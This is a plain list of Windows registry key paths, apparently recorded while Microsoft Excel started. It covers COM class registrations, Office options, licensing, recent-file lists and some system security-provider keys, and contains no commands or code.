HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\CanvasInkOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AnimationDiagnostic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\NoTrack
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MaxPropsStreamSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FullCalcOnLoadOldFile
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Charting
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Charting
HKEY_CURRENT_USER\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ReversedArrowTypeBracketsBraceOnBinarySave
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertRRectCalloutToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertChevronToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Smart Tag
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableDocumentAssemblies
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockOleAutoActivate
HKEY_CURRENT_USER\SOFTWARE\SyncEngines\Providers\OneDrive
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Workflow\Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Workflow\Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Workflow\WorkgroupCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CreateVbeProjOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableSmartDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ReentryToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\infoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\157E290
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\157E290\157E290
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\TrustBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Kobe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\LineageTeachingCalloutTimeShown
HKEY_CURRENT_USER\Software\Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PreferOTFontIcon
HKEY_CURRENT_USER\Software\Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}\InsecureQI
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\LastUpdate\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF\LastUpdate\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO\FileActivityStoreVersion
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF\Signal\PreWarm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm\ExcelLastUseTimestamp
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Place MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Recent Files
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Recent Files
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFirstRunOptin
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Registration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EulasSetAccepted
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DisconnectedState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\UpdateUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\CDNBaseUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserCCSDisabled
HKEY_CURRENT_USER\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\AppID
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\DLP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\DLP
HKEY_CLASSES_ROOT\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\Automation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Automation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EmulateOLS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Word\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TargetedMessagingService
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\UpsellState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AirSpaceOArtEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlayUnselectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlaySelectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\ResiliencySimulator
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{94269c4e-071a-4116-90e6-52e557067e4e}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{94269c4e-071a-4116-90e6-52e557067e4e}\InsecureQI
HKEY_CURRENT_USER\Software\Policies\SyncEngines\Providers\OneDrive
HKEY_CURRENT_USER\Software\SyncEngines\Providers\OneDrive
HKEY_CURRENT_USER\Software\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{00000344-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00000344-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2d3468c1-36a7-43b6-ac24-d3f02fd9607a}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2d3468c1-36a7-43b6-ac24-d3f02fd9607a}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PenPointerMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelaySleepLoopWindowSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelaySpinCountThreshold
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelayBaseYield
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtFactorYield
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelayMaxYield
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOutSeconds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\10
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SynchronousPrintHandleAccessMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\PrinterDriverUnloadTimeOutMinutes
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Srp\GP\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Srp\Gp\RuleCount
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en
